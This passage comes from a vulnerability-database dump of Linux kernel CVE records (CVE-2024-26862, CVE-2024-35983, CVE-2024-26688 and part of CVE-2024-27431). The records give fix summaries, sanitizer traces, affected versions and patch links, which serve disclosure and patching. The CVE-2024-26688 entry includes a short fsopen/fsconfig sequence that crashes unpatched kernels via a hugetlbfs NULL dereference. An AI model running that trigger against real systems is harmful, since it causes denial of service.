"url": "https://git.kernel.org/stable/c/5f4e51abfbe6eb444fa91906a5cd083044278297"
},
{
"url": "https://git.kernel.org/stable/c/f0363af9619c77730764f10360e36c6445c12f7b"
},
{
"url": "https://git.kernel.org/stable/c/3420b3ff1ff489c177ea1cb7bd9fbbc4e9a0be95"
},
{
"url": "https://git.kernel.org/stable/c/f562e4c4aab00986dde3093c4be919c3f2b85a4a"
},
{
"url": "https://git.kernel.org/stable/c/eaa7cb836659ced2d9f814ac32aa3ec193803ed6"
},
{
"url": "https://git.kernel.org/stable/c/2487007aa3b9fafbd2cb14068f49791ce1d7ede5"
}
],
"title": "cpumap: Zero-initialise xdp_rxq_info struct before running XDP program",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-27431",
"datePublished": "2024-05-17T12:02:10.274Z",
"dateReserved": "2024-02-25T13:47:42.686Z",
"dateUpdated": "2025-05-04T09:04:51.900Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26862 (GCVE-0-2024-26862)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
packet: annotate data-races around ignore_outgoing
ignore_outgoing is read locklessly from dev_queue_xmit_nit()
and packet_getsockopt()
Add appropriate READ_ONCE()/WRITE_ONCE() annotations.
syzbot reported:
BUG: KCSAN: data-race in dev_queue_xmit_nit / packet_setsockopt
write to 0xffff888107804542 of 1 bytes by task 22618 on cpu 0:
packet_setsockopt+0xd83/0xfd0 net/packet/af_packet.c:4003
do_sock_setsockopt net/socket.c:2311 [inline]
__sys_setsockopt+0x1d8/0x250 net/socket.c:2334
__do_sys_setsockopt net/socket.c:2343 [inline]
__se_sys_setsockopt net/socket.c:2340 [inline]
__x64_sys_setsockopt+0x66/0x80 net/socket.c:2340
do_syscall_64+0xd3/0x1d0
entry_SYSCALL_64_after_hwframe+0x6d/0x75
read to 0xffff888107804542 of 1 bytes by task 27 on cpu 1:
dev_queue_xmit_nit+0x82/0x620 net/core/dev.c:2248
xmit_one net/core/dev.c:3527 [inline]
dev_hard_start_xmit+0xcc/0x3f0 net/core/dev.c:3547
__dev_queue_xmit+0xf24/0x1dd0 net/core/dev.c:4335
dev_queue_xmit include/linux/netdevice.h:3091 [inline]
batadv_send_skb_packet+0x264/0x300 net/batman-adv/send.c:108
batadv_send_broadcast_skb+0x24/0x30 net/batman-adv/send.c:127
batadv_iv_ogm_send_to_if net/batman-adv/bat_iv_ogm.c:392 [inline]
batadv_iv_ogm_emit net/batman-adv/bat_iv_ogm.c:420 [inline]
batadv_iv_send_outstanding_bat_ogm_packet+0x3f0/0x4b0 net/batman-adv/bat_iv_ogm.c:1700
process_one_work kernel/workqueue.c:3254 [inline]
process_scheduled_works+0x465/0x990 kernel/workqueue.c:3335
worker_thread+0x526/0x730 kernel/workqueue.c:3416
kthread+0x1d1/0x210 kernel/kthread.c:388
ret_from_fork+0x4b/0x60 arch/x86/kernel/process.c:147
ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:243
value changed: 0x00 -> 0x01
Reported by Kernel Concurrency Sanitizer on:
CPU: 1 PID: 27 Comm: kworker/u8:1 Tainted: G W 6.8.0-syzkaller-08073-g480e035fc4c7 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/29/2024
Workqueue: bat_events batadv_iv_send_outstanding_bat_ogm_packet
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: fa788d986a3aac5069378ed04697bd06f83d3488 Version: fa788d986a3aac5069378ed04697bd06f83d3488 Version: fa788d986a3aac5069378ed04697bd06f83d3488 Version: fa788d986a3aac5069378ed04697bd06f83d3488 Version: fa788d986a3aac5069378ed04697bd06f83d3488 Version: fa788d986a3aac5069378ed04697bd06f83d3488 Version: fa788d986a3aac5069378ed04697bd06f83d3488 Version: fa788d986a3aac5069378ed04697bd06f83d3488 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26862",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-06-17T17:41:30.819714Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-17T17:48:16.027Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:21:04.133Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/84c510411e321caff3c07e6cd0f917f06633cfc0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/68e84120319d4fc298fcdb14cf0bea6a0f64ffbd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d35b62c224e70797f8a1c37fe9bc4b3e294b7560"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ef7eed7e11d23337310ecc2c014ecaeea52719c5"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2c02c5059c78a52d170bdee4a369b470de6deb37"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ee413f30ec4fe94a0bdf32c8f042cb06fa913234"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/8b1e273c6afcf00d3c40a54ada7d6aac1b503b97"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6ebfad33161afacb3e1e59ed1c2feefef70f9f97"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"net/core/dev.c",
"net/packet/af_packet.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "84c510411e321caff3c07e6cd0f917f06633cfc0",
"status": "affected",
"version": "fa788d986a3aac5069378ed04697bd06f83d3488",
"versionType": "git"
},
{
"lessThan": "68e84120319d4fc298fcdb14cf0bea6a0f64ffbd",
"status": "affected",
"version": "fa788d986a3aac5069378ed04697bd06f83d3488",
"versionType": "git"
},
{
"lessThan": "d35b62c224e70797f8a1c37fe9bc4b3e294b7560",
"status": "affected",
"version": "fa788d986a3aac5069378ed04697bd06f83d3488",
"versionType": "git"
},
{
"lessThan": "ef7eed7e11d23337310ecc2c014ecaeea52719c5",
"status": "affected",
"version": "fa788d986a3aac5069378ed04697bd06f83d3488",
"versionType": "git"
},
{
"lessThan": "2c02c5059c78a52d170bdee4a369b470de6deb37",
"status": "affected",
"version": "fa788d986a3aac5069378ed04697bd06f83d3488",
"versionType": "git"
},
{
"lessThan": "ee413f30ec4fe94a0bdf32c8f042cb06fa913234",
"status": "affected",
"version": "fa788d986a3aac5069378ed04697bd06f83d3488",
"versionType": "git"
},
{
"lessThan": "8b1e273c6afcf00d3c40a54ada7d6aac1b503b97",
"status": "affected",
"version": "fa788d986a3aac5069378ed04697bd06f83d3488",
"versionType": "git"
},
{
"lessThan": "6ebfad33161afacb3e1e59ed1c2feefef70f9f97",
"status": "affected",
"version": "fa788d986a3aac5069378ed04697bd06f83d3488",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"net/core/dev.c",
"net/packet/af_packet.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.20"
},
{
"lessThan": "4.20",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.273",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.214",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.153",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.83",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.23",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.11",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "4.20",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.20",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\npacket: annotate data-races around ignore_outgoing\n\nignore_outgoing is read locklessly from dev_queue_xmit_nit()\nand packet_getsockopt()\n\nAdd appropriate READ_ONCE()/WRITE_ONCE() annotations.\n\nsyzbot reported:\n\nBUG: KCSAN: data-race in dev_queue_xmit_nit / packet_setsockopt\n\nwrite to 0xffff888107804542 of 1 bytes by task 22618 on cpu 0:\n packet_setsockopt+0xd83/0xfd0 net/packet/af_packet.c:4003\n do_sock_setsockopt net/socket.c:2311 [inline]\n __sys_setsockopt+0x1d8/0x250 net/socket.c:2334\n __do_sys_setsockopt net/socket.c:2343 [inline]\n __se_sys_setsockopt net/socket.c:2340 [inline]\n __x64_sys_setsockopt+0x66/0x80 net/socket.c:2340\n do_syscall_64+0xd3/0x1d0\n entry_SYSCALL_64_after_hwframe+0x6d/0x75\n\nread to 0xffff888107804542 of 1 bytes by task 27 on cpu 1:\n dev_queue_xmit_nit+0x82/0x620 net/core/dev.c:2248\n xmit_one net/core/dev.c:3527 [inline]\n dev_hard_start_xmit+0xcc/0x3f0 net/core/dev.c:3547\n __dev_queue_xmit+0xf24/0x1dd0 net/core/dev.c:4335\n dev_queue_xmit include/linux/netdevice.h:3091 [inline]\n batadv_send_skb_packet+0x264/0x300 net/batman-adv/send.c:108\n batadv_send_broadcast_skb+0x24/0x30 net/batman-adv/send.c:127\n batadv_iv_ogm_send_to_if net/batman-adv/bat_iv_ogm.c:392 [inline]\n batadv_iv_ogm_emit net/batman-adv/bat_iv_ogm.c:420 [inline]\n batadv_iv_send_outstanding_bat_ogm_packet+0x3f0/0x4b0 net/batman-adv/bat_iv_ogm.c:1700\n process_one_work kernel/workqueue.c:3254 [inline]\n process_scheduled_works+0x465/0x990 kernel/workqueue.c:3335\n worker_thread+0x526/0x730 kernel/workqueue.c:3416\n kthread+0x1d1/0x210 kernel/kthread.c:388\n ret_from_fork+0x4b/0x60 arch/x86/kernel/process.c:147\n ret_from_fork_asm+0x1a/0x30 arch/x86/entry/entry_64.S:243\n\nvalue changed: 0x00 -\u003e 0x01\n\nReported by Kernel Concurrency Sanitizer on:\nCPU: 1 PID: 27 Comm: kworker/u8:1 Tainted: G W 6.8.0-syzkaller-08073-g480e035fc4c7 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 02/29/2024\nWorkqueue: bat_events batadv_iv_send_outstanding_bat_ogm_packet"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:58:13.163Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/84c510411e321caff3c07e6cd0f917f06633cfc0"
},
{
"url": "https://git.kernel.org/stable/c/68e84120319d4fc298fcdb14cf0bea6a0f64ffbd"
},
{
"url": "https://git.kernel.org/stable/c/d35b62c224e70797f8a1c37fe9bc4b3e294b7560"
},
{
"url": "https://git.kernel.org/stable/c/ef7eed7e11d23337310ecc2c014ecaeea52719c5"
},
{
"url": "https://git.kernel.org/stable/c/2c02c5059c78a52d170bdee4a369b470de6deb37"
},
{
"url": "https://git.kernel.org/stable/c/ee413f30ec4fe94a0bdf32c8f042cb06fa913234"
},
{
"url": "https://git.kernel.org/stable/c/8b1e273c6afcf00d3c40a54ada7d6aac1b503b97"
},
{
"url": "https://git.kernel.org/stable/c/6ebfad33161afacb3e1e59ed1c2feefef70f9f97"
}
],
"title": "packet: annotate data-races around ignore_outgoing",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26862",
"datePublished": "2024-04-17T10:27:25.634Z",
"dateReserved": "2024-02-19T14:20:24.184Z",
"dateUpdated": "2025-05-04T08:58:13.163Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35983 (GCVE-0-2024-35983)
Vulnerability from cvelistv5
Published
2024-05-20 09:47
Modified
2025-05-04 12:56
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
bounds: Use the right number of bits for power-of-two CONFIG_NR_CPUS
bits_per() rounds up to the next power of two when passed a power of
two. This causes crashes on some machines and configurations.
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: d6077e0d38b4953c863d0db4a5b3f41d21e0d546 Version: 83a2275f9d3230c761014b1467888b1ef469be74 Version: d2a7a81088c6abe778b0a93a7eeb79487a943818 Version: 428ca0000f0abd5c99354c52a36becf2b815ca21 Version: b46c822f8b555b9513df44047b0e72c06720df62 Version: cf778fff03be1ee88c49b72959650147573c3301 Version: f2d5dcb48f7ba9e3ff249d58fc1fa963d374e66a Version: b2e1b090a590d41abe647eadb6bf2a5dc47b63ab |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35983",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-20T13:33:05.860363Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:34:16.061Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.040Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d34a516f2635090d36a306f84573e8de3d7374ce"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/66297b2ceda841f809637731d287bda3a93b49d8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/93ba36238db6a74a82feb3dc476e25ea424ad630"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9b7c5004d7c5ae062134052a85290869a015814c"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/15aa09d6d84629eb5296de30ac0aa19a33512f16"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ebfe41889b762f1933c6762f6624b9724a25bee0"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5af385f5f4cddf908f663974847a4083b2ff2c79"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bounds.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "d34a516f2635090d36a306f84573e8de3d7374ce",
"status": "affected",
"version": "d6077e0d38b4953c863d0db4a5b3f41d21e0d546",
"versionType": "git"
},
{
"lessThan": "66297b2ceda841f809637731d287bda3a93b49d8",
"status": "affected",
"version": "83a2275f9d3230c761014b1467888b1ef469be74",
"versionType": "git"
},
{
"lessThan": "93ba36238db6a74a82feb3dc476e25ea424ad630",
"status": "affected",
"version": "d2a7a81088c6abe778b0a93a7eeb79487a943818",
"versionType": "git"
},
{
"lessThan": "9b7c5004d7c5ae062134052a85290869a015814c",
"status": "affected",
"version": "428ca0000f0abd5c99354c52a36becf2b815ca21",
"versionType": "git"
},
{
"lessThan": "15aa09d6d84629eb5296de30ac0aa19a33512f16",
"status": "affected",
"version": "b46c822f8b555b9513df44047b0e72c06720df62",
"versionType": "git"
},
{
"lessThan": "ebfe41889b762f1933c6762f6624b9724a25bee0",
"status": "affected",
"version": "cf778fff03be1ee88c49b72959650147573c3301",
"versionType": "git"
},
{
"lessThan": "5af385f5f4cddf908f663974847a4083b2ff2c79",
"status": "affected",
"version": "f2d5dcb48f7ba9e3ff249d58fc1fa963d374e66a",
"versionType": "git"
},
{
"status": "affected",
"version": "b2e1b090a590d41abe647eadb6bf2a5dc47b63ab",
"versionType": "git"
}
]
},
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"kernel/bounds.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "5.4.275",
"status": "affected",
"version": "5.4.274",
"versionType": "semver"
},
{
"lessThan": "5.10.216",
"status": "affected",
"version": "5.10.215",
"versionType": "semver"
},
{
"lessThan": "5.15.158",
"status": "affected",
"version": "5.15.154",
"versionType": "semver"
},
{
"lessThan": "6.1.90",
"status": "affected",
"version": "6.1.84",
"versionType": "semver"
},
{
"lessThan": "6.6.30",
"status": "affected",
"version": "6.6.24",
"versionType": "semver"
},
{
"lessThan": "6.8.9",
"status": "affected",
"version": "6.8.3",
"versionType": "semver"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "5.4.274",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "5.10.215",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "5.15.154",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "6.1.84",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "6.6.24",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "6.8.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionStartIncluding": "6.7.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbounds: Use the right number of bits for power-of-two CONFIG_NR_CPUS\n\nbits_per() rounds up to the next power of two when passed a power of\ntwo. This causes crashes on some machines and configurations."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T12:56:10.604Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d34a516f2635090d36a306f84573e8de3d7374ce"
},
{
"url": "https://git.kernel.org/stable/c/66297b2ceda841f809637731d287bda3a93b49d8"
},
{
"url": "https://git.kernel.org/stable/c/93ba36238db6a74a82feb3dc476e25ea424ad630"
},
{
"url": "https://git.kernel.org/stable/c/9b7c5004d7c5ae062134052a85290869a015814c"
},
{
"url": "https://git.kernel.org/stable/c/15aa09d6d84629eb5296de30ac0aa19a33512f16"
},
{
"url": "https://git.kernel.org/stable/c/ebfe41889b762f1933c6762f6624b9724a25bee0"
},
{
"url": "https://git.kernel.org/stable/c/5af385f5f4cddf908f663974847a4083b2ff2c79"
}
],
"title": "bounds: Use the right number of bits for power-of-two CONFIG_NR_CPUS",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35983",
"datePublished": "2024-05-20T09:47:51.079Z",
"dateReserved": "2024-05-17T13:50:33.145Z",
"dateUpdated": "2025-05-04T12:56:10.604Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26688 (GCVE-0-2024-26688)
Vulnerability from cvelistv5
Published
2024-04-03 14:54
Modified
2025-05-04 08:54
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
fs,hugetlb: fix NULL pointer dereference in hugetlbs_fill_super
When configuring a hugetlb filesystem via the fsconfig() syscall, there is
a possible NULL dereference in hugetlbfs_fill_super() caused by assigning
NULL to ctx->hstate in hugetlbfs_parse_param() when the requested pagesize
is non valid.
E.g: Taking the following steps:
fd = fsopen("hugetlbfs", FSOPEN_CLOEXEC);
fsconfig(fd, FSCONFIG_SET_STRING, "pagesize", "1024", 0);
fsconfig(fd, FSCONFIG_CMD_CREATE, NULL, NULL, 0);
Given that the requested "pagesize" is invalid, ctxt->hstate will be replaced
with NULL, losing its previous value, and we will print an error:
...
...
case Opt_pagesize:
ps = memparse(param->string, &rest);
ctx->hstate = h;
if (!ctx->hstate) {
pr_err("Unsupported page size %lu MB\n", ps / SZ_1M);
return -EINVAL;
}
return 0;
...
...
This is a problem because later on, we will dereference ctxt->hstate in
hugetlbfs_fill_super()
...
...
sb->s_blocksize = huge_page_size(ctx->hstate);
...
...
Causing below Oops.
Fix this by replacing cxt->hstate value only when then pagesize is known
to be valid.
kernel: hugetlbfs: Unsupported page size 0 MB
kernel: BUG: kernel NULL pointer dereference, address: 0000000000000028
kernel: #PF: supervisor read access in kernel mode
kernel: #PF: error_code(0x0000) - not-present page
kernel: PGD 800000010f66c067 P4D 800000010f66c067 PUD 1b22f8067 PMD 0
kernel: Oops: 0000 [#1] PREEMPT SMP PTI
kernel: CPU: 4 PID: 5659 Comm: syscall Tainted: G E 6.8.0-rc2-default+ #22 5a47c3fef76212addcc6eb71344aabc35190ae8f
kernel: Hardware name: Intel Corp. GROVEPORT/GROVEPORT, BIOS GVPRCRB1.86B.0016.D04.1705030402 05/03/2017
kernel: RIP: 0010:hugetlbfs_fill_super+0xb4/0x1a0
kernel: Code: 48 8b 3b e8 3e c6 ed ff 48 85 c0 48 89 45 20 0f 84 d6 00 00 00 48 b8 ff ff ff ff ff ff ff 7f 4c 89 e7 49 89 44 24 20 48 8b 03 <8b> 48 28 b8 00 10 00 00 48 d3 e0 49 89 44 24 18 48 8b 03 8b 40 28
kernel: RSP: 0018:ffffbe9960fcbd48 EFLAGS: 00010246
kernel: RAX: 0000000000000000 RBX: ffff9af5272ae780 RCX: 0000000000372004
kernel: RDX: ffffffffffffffff RSI: ffffffffffffffff RDI: ffff9af555e9b000
kernel: RBP: ffff9af52ee66b00 R08: 0000000000000040 R09: 0000000000370004
kernel: R10: ffffbe9960fcbd48 R11: 0000000000000040 R12: ffff9af555e9b000
kernel: R13: ffffffffa66b86c0 R14: ffff9af507d2f400 R15: ffff9af507d2f400
kernel: FS: 00007ffbc0ba4740(0000) GS:ffff9b0bd7000000(0000) knlGS:0000000000000000
kernel: CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
kernel: CR2: 0000000000000028 CR3: 00000001b1ee0000 CR4: 00000000001506f0
kernel: Call Trace:
kernel: <TASK>
kernel: ? __die_body+0x1a/0x60
kernel: ? page_fault_oops+0x16f/0x4a0
kernel: ? search_bpf_extables+0x65/0x70
kernel: ? fixup_exception+0x22/0x310
kernel: ? exc_page_fault+0x69/0x150
kernel: ? asm_exc_page_fault+0x22/0x30
kernel: ? __pfx_hugetlbfs_fill_super+0x10/0x10
kernel: ? hugetlbfs_fill_super+0xb4/0x1a0
kernel: ? hugetlbfs_fill_super+0x28/0x1a0
kernel: ? __pfx_hugetlbfs_fill_super+0x10/0x10
kernel: vfs_get_super+0x40/0xa0
kernel: ? __pfx_bpf_lsm_capable+0x10/0x10
kernel: vfs_get_tree+0x25/0xd0
kernel: vfs_cmd_create+0x64/0xe0
kernel: __x64_sys_fsconfig+0x395/0x410
kernel: do_syscall_64+0x80/0x160
kernel: ? syscall_exit_to_user_mode+0x82/0x240
kernel: ? do_syscall_64+0x8d/0x160
kernel: ? syscall_exit_to_user_mode+0x82/0x240
kernel: ? do_syscall_64+0x8d/0x160
kernel: ? exc_page_fault+0x69/0x150
kernel: entry_SYSCALL_64_after_hwframe+0x6e/0x76
kernel: RIP: 0033:0x7ffbc0cb87c9
kernel: Code: 00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 66 90 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 97 96 0d 00 f7 d8 64 89 01 48
kernel: RSP: 002b:00007ffc29d2f388 EFLAGS: 00000206 ORIG_RAX: 00000000000001af
kernel: RAX: fffffffffff
---truncated---
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 32021982a324dce93b4ae00c06213bf45fb319c8 Version: 32021982a324dce93b4ae00c06213bf45fb319c8 Version: 32021982a324dce93b4ae00c06213bf45fb319c8 Version: 32021982a324dce93b4ae00c06213bf45fb319c8 Version: 32021982a324dce93b4ae00c06213bf45fb319c8 Version: 32021982a324dce93b4ae00c06213bf45fb319c8 Version: 32021982a324dce93b4ae00c06213bf45fb319c8 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:14:12.699Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/1dde8ef4b7a749ae1bc73617c91775631d167557"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/80d852299987a8037be145a94f41874228f1a773"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/22850c9950a4e43a67299755d11498f3292d02ff"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/2e2c07104b4904aed1389a59b25799b95a85b5b9"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/13c5a9fb07105557a1fa9efdb4f23d7ef30b7274"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ec78418801ef7b0c22cd6a30145ec480dd48db39"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/79d72c68c58784a3e1cd2378669d51bfd0cb7498"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26688",
"options": [
{
